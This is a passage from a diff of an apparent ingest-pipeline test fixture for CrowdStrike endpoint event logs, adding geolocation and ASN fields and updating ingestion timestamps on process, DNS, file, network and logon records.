A256HashData\":\"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f\",\"ScreenshotsTakenCount\":\"0\",\"ScriptEngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectStackCount\":\"0\",\"SuspiciousCredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"TargetProcessId\":\"3100508103359\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-5-18\",\"UserTime\":\"6406250\",\"aid\":\"ffffffffb5db4b2e7ec89aba537adcc2\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"EndOfProcessV15\",\"timestamp\":\"1604855099935\"}", "created": "2020-11-08T17:04:59.935Z", "kind": "event", @@ -6067,6 +6862,23 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", + "type": "agent", + "version": "1007.4.0009304.1" + }, "process": { "pid": 10507, "thread": { @@ -6077,24 +6889,10 @@ "sha256": "3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3" } }, + "@timestamp": "2020-11-08T17:05:01.341Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0009304.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2020-11-08T17:05:01.341Z", "ecs": { "version": "1.12.0" }, @@ -6111,7 +6909,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151079900Z", + "ingested": "2021-12-14T14:41:26.533782555Z", "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"ContextProcessId\":\"311775981885093125\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.341\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"10507\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"311775981885093125\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"EndOfProcessMacV12\",\"timestamp\":\"1604855100139\"}", "created": "2020-11-08T17:05:00.139Z", "kind": "event", @@ -6145,7 +6943,13 @@ "NetworkCloseCount": 0, "SuspectStackCount": 0, "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -6178,12 +6982,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff3a5a424fa02450da53619745", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff3a5a424fa02450da53619745", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:00.030Z", "ecs": { @@ -6203,7 +7016,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151086200Z", + "ingested": "2021-12-14T14:41:26.533782996Z", "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"D:\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe --ps2\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe\",\"ImageSubsystem\":\"3\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"571391f723a439e985a2064337e2802a\",\"ParentAuthenticationId\":\"999\",\"ParentBaseFileName\":\"splunkd.exe\",\"ParentProcessId\":\"17346335177\",\"ProcessCreateFlags\":\"67634688\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"24577\",\"ProcessStartTime\":\"1604855099.406\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6116\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720\",\"SessionId\":\"0\",\"SourceProcessId\":\"17346335177\",\"SourceThreadId\":\"107650023406\",\"Tags\":\"27, 151, 12094627905582, 12094627906234\",\"TargetProcessId\":\"583707537390\",\"TokenType\":\"1\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"384\",\"aid\":\"ffffffff3a5a424fa02450da53619745\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-a09e-06f79d630255\",\"name\":\"ProcessRollup2V17\",\"timestamp\":\"1604855100030\"}", "created": "2020-11-08T17:05:00.030Z", "kind": "event", @@ -6269,12 +7082,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff4f1444bab96568879cb43556", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff4f1444bab96568879cb43556", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:04:55.961Z", "ecs": { @@ -6292,7 +7114,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151092400Z", + "ingested": "2021-12-14T14:41:26.533783428Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2784638081\",\"ContextProcessId\":\"259090530891\",\"ContextThreadId\":\"16409623709004\",\"ContextTimeStamp\":\"1604855095.961\",\"DnsRequestCount\":\"1\",\"DomainName\":\"comp1.dom2\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff4f1444bab96568879cb43556\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DnsRequest\",\"id\":\"ffffffff-1111-11eb-8077-0606f7dcf2ed\",\"name\":\"DnsRequestV3\",\"timestamp\":\"1604855099913\"}", "created": "2020-11-08T17:04:59.913Z", "kind": "event", @@ -6334,12 +7156,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff32ba43a483e76c6f0a4aa26f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.8.0009806.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff32ba43a483e76c6f0a4aa26f", + "type": "agent", + "version": "1007.8.0009806.1" }, "@timestamp": "2020-11-08T17:05:01.645Z", "file": { @@ -6363,7 +7194,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151098800Z", + "ingested": "2021-12-14T14:41:26.533783807Z", "original": "{\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"ContextProcessId\":\"321385820045701199\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.645\",\"Entitlements\":\"15\",\"GID\":\"0\",\"TargetFileName\":\"/etc/shadow\",\"UID\":\"0\",\"UnixMode\":\"32768\",\"aid\":\"ffffffff32ba43a483e76c6f0a4aa26f\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"CriticalFileAccessed\",\"id\":\"ffffffff-1111-11eb-b70d-027f9ced2001\",\"name\":\"CriticalFileAccessedLinV1\",\"timestamp\":\"1604855102247\"}", "created": "2020-11-08T17:05:02.247Z", "kind": "alert", @@ -6425,12 +7256,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0009304.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", + "type": "agent", + "version": "1007.4.0009304.1" }, "@timestamp": "2020-11-08T17:05:09.180Z", "ecs": { @@ -6450,7 +7290,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151105100Z", + "ingested": "2021-12-14T14:41:26.533784256Z", "original": "{\"CommandLine\":\"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/usr/bin/plutil\",\"MD5HashData\":\"d51cef1b288e2032aee9805deff04bfd\",\"MachOSubType\":\"1\",\"ParentProcessId\":\"311774817965726568\",\"ProcessEndTime\":\"\",\"ProcessGroupId\":\"311774817965726568\",\"ProcessStartTime\":\"1604855111.240\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"10692\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SourceProcessId\":\"311776004953765502\",\"SourceThreadId\":\"0\",\"Tags\":\"27, 12094627905582, 12094627906234\",\"TargetProcessId\":\"311776004953765502\",\"UID\":\"0\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"ProcessRollup2MacV3\",\"timestamp\":\"1604855109180\"}", "created": "2020-11-08T17:05:09.180Z", "kind": "event", @@ -6506,12 +7346,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff8f1e4b77b4dae5debaa1c8bc", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff8f1e4b77b4dae5debaa1c8bc", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:14.133Z", "file": { @@ -6537,7 +7386,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151111400Z", + "ingested": "2021-12-14T14:41:26.533784704Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3899738370\",\"ContextProcessId\":\"1546527409909\",\"ContextThreadId\":\"4711690090889\",\"ContextTimeStamp\":\"1604855114.133\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00\",\"FileObject\":\"18446655033844205120\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"88080484\",\"ShareAccess\":\"1\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\Temp\\\\__PSScriptPolicyTest_dvkjnbka.apn.ps1\",\"aid\":\"ffffffff8f1e4b77b4dae5debaa1c8bc\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewScriptWritten\",\"id\":\"ffffffff-1111-11eb-80b5-06e11a66e03d\",\"name\":\"NewScriptWrittenV7\",\"timestamp\":\"1604855114427\"}", "created": "2020-11-08T17:05:14.427Z", "kind": "event", @@ -6578,8 +7427,20 @@ "type": "macos" }, "destination": { - "port": 443, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 443, "ip": "67.43.156.14" }, "source": { @@ -6599,12 +7460,21 @@ "direction": "inbound" }, "observer": { - "serial_number": "ffffffffd4094240a6b1d12aaf304f4f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0012205.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffd4094240a6b1d12aaf304f4f", + "type": "agent", + "version": "1007.4.0012205.1" }, "@timestamp": "2020-11-08T17:05:16.421Z", "ecs": { @@ -6626,7 +7496,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151117800Z", + "ingested": "2021-12-14T14:41:26.533785092Z", "original": "{\"ConfigBuild\":\"1007.4.0012205.1\",\"ConfigStateHash\":\"1306766522\",\"ConnectionDirection\":\"1\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321275232072440993\",\"ContextTimeStamp\":\"1604855116.421\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"0.0.0.0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"67.43.156.14\",\"RemotePort\":\"443\",\"aid\":\"ffffffffd4094240a6b1d12aaf304f4f\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-aca9-02683aed2a0d\",\"name\":\"NetworkConnectIP4MacV5\",\"timestamp\":\"1604855116502\"}", "created": "2020-11-08T17:05:16.502Z", "kind": "event", @@ -6658,13 +7528,37 @@ "type": "windows" }, "destination": { - "port": 443, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 443, "ip": "67.43.156.14" }, "source": { - "port": 53961, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 53961, "ip": "67.43.156.14" }, "url": { @@ -6680,12 +7574,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "fffffffff000426eb99afaa2ccdcbc17", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "fffffffff000426eb99afaa2ccdcbc17", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:16.849Z", "ecs": { @@ -6705,7 +7608,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151124100Z", + "ingested": "2021-12-14T14:41:26.533785482Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2602391615\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"223442259384\",\"ContextTimeStamp\":\"1604855116.849\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"67.43.156.14\",\"LocalPort\":\"53961\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"67.43.156.14\",\"RemotePort\":\"443\",\"aid\":\"fffffffff000426eb99afaa2ccdcbc17\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-b0eb-06be7616c211\",\"name\":\"NetworkConnectIP4V5\",\"timestamp\":\"1604855116942\"}", "created": "2020-11-08T17:05:16.942Z", "kind": "event", @@ -6747,12 +7650,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff8d2e4b4f9b21b40633a8d579", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff8d2e4b4f9b21b40633a8d579", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:04:51.781Z", "ecs": { @@ -6774,7 +7686,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151130300Z", + "ingested": "2021-12-14T14:41:26.533785897Z", "original": "{\"AuthenticationId\":\"6580764513\",\"AuthenticationPackage\":\"Negotiate\",\"ClientComputerName\":\"-\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"816054990879\",\"ContextThreadId\":\"52913017705957\",\"ContextTimeStamp\":\"1604855091.781\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"NT AUTHORITY\",\"LogonServer\":\"\",\"LogonTime\":\"1604855091.781\",\"LogonType\":\"9\",\"PasswordLastSet\":\"\",\"RemoteAccount\":\"1\",\"UserFlags\":\"0\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"12\",\"UserName\":\"SYSTEM\",\"UserPrincipal\":\"user4@dom2\",\"UserSid\":\"S-1-5-18\",\"aid\":\"ffffffff8d2e4b4f9b21b40633a8d579\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogon\",\"id\":\"ffffffff-1111-11eb-a8cf-0649c95cfa1d\",\"name\":\"UserLogonV8\",\"timestamp\":\"1604855121077\"}", "created": "2020-11-08T17:05:21.077Z", "kind": "event", @@ -6828,12 +7740,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff2c47454cba360bc404a607bb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff2c47454cba360bc404a607bb", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:20.785Z", "file": { @@ -6865,7 +7786,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151136700Z", + "ingested": "2021-12-14T14:41:26.533786288Z", "original": "{\"AuthenticationId\":\"2007206396\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"4415814628770\",\"ContextThreadId\":\"41392001729898\",\"ContextTimeStamp\":\"1604855120.785\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1000\\u0026DEV_0054\\u0026SUBSYS_197615AD\\u0026REV_01\\\\4\\u00261f16fef7\\u00260\\u002600A8\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c\",\"FileObject\":\"18446708893089967904\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"IsTransactedFile\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"SHA256HashData\":\"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182\",\"Size\":\"6144\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\Users\\\\user10\\\\AppData\\\\Local\\\\Temp\\\\ec1ijefl.dll\",\"TokenType\":\"1\",\"aid\":\"ffffffff2c47454cba360bc404a607bb\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PeFileWritten\",\"id\":\"ffffffff-1111-11eb-b091-06f6cca0a049\",\"name\":\"PeFileWrittenV14\",\"timestamp\":\"1604855121109\"}", "created": "2020-11-08T17:05:21.109Z", "kind": "event", @@ -6899,24 +7820,27 @@ } }, { - "os": { - "type": "windows" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "ffffffffe0104823bd3de859d5bc8bc7", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffe0104823bd3de859d5bc8bc7", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:34.461Z", + "os": { + "type": "windows" + }, "ecs": { "version": "1.12.0" }, @@ -6937,7 +7861,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151143Z", + "ingested": "2021-12-14T14:41:26.533786684Z", "original": "{\"AuthenticationId\":\"317005428\",\"AuthenticationPackage\":\"Negotiate\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3950066843\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogoffTime\":\"1604855132.756\",\"LogonDomain\":\"dom1\",\"LogonServer\":\"srv2\",\"LogonTime\":\"1604855131.666\",\"LogonType\":\"7\",\"PasswordLastSet\":\"1598119332.510\",\"RemoteAccount\":\"1\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogoffType\":\"3\",\"UserLogonFlags\":\"0\",\"UserName\":\"user4\",\"UserPrincipal\":\"user.name@dom2.com\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-28636\",\"aid\":\"ffffffffe0104823bd3de859d5bc8bc7\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogoff\",\"id\":\"ffffffff-1111-11eb-8913-0287fd11c79b\",\"name\":\"UserLogoffV3\",\"timestamp\":\"1604855134461\"}", "created": "2020-11-08T17:05:34.461Z", "kind": "event", @@ -6976,7 +7900,13 @@ "id": "S-1-5-21-606747145-1364589140-725345543-28636", "email": "user.name@dom2.com", "domain": "dom2.com" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -6995,12 +7925,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff425942f58382dbb11350eeda", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff425942f58382dbb11350eeda", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:03:45.966Z", "file": { @@ -7026,7 +7965,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151149300Z", + "ingested": "2021-12-14T14:41:26.533787066Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"537307300\",\"ContextProcessId\":\"635780922149\",\"ContextThreadId\":\"9479299143023\",\"ContextTimeStamp\":\"1604855025.966\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"0e02a8c7ed9d244887cef0409af0e6190030000000001100\",\"FileObject\":\"18446695174291796544\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"83886176\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Program Files\\\\Snow Software\\\\Inventory\\\\Agent\\\\cloudmeteringhost.exe\",\"aid\":\"ffffffff425942f58382dbb11350eeda\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableWritten\",\"id\":\"ffffffff-1111-11eb-93cb-067deb43537b\",\"name\":\"NewExecutableWrittenV1\",\"timestamp\":\"1604855149643\"}", "created": "2020-11-08T17:05:49.643Z", "kind": "event", @@ -7091,12 +8030,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffffa51b4acf9dbc1fc273e6145c", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa51b4acf9dbc1fc273e6145c", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:50.066Z", "ecs": { @@ -7118,7 +8066,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151155600Z", + "ingested": "2021-12-14T14:41:26.533787447Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"50714198593318\",\"ContextThreadId\":\"194302491825207\",\"ContextTimeStamp\":\"1604855150.066\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"59491\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa51b4acf9dbc1fc273e6145c\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"NetworkListenIP4V5\",\"timestamp\":\"1604855150545\"}", "created": "2020-11-08T17:05:50.545Z", "kind": "event", @@ -7154,6 +8102,18 @@ "type": "windows" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -7164,12 +8124,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffd8844a59acce5e1f4ad01888", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" 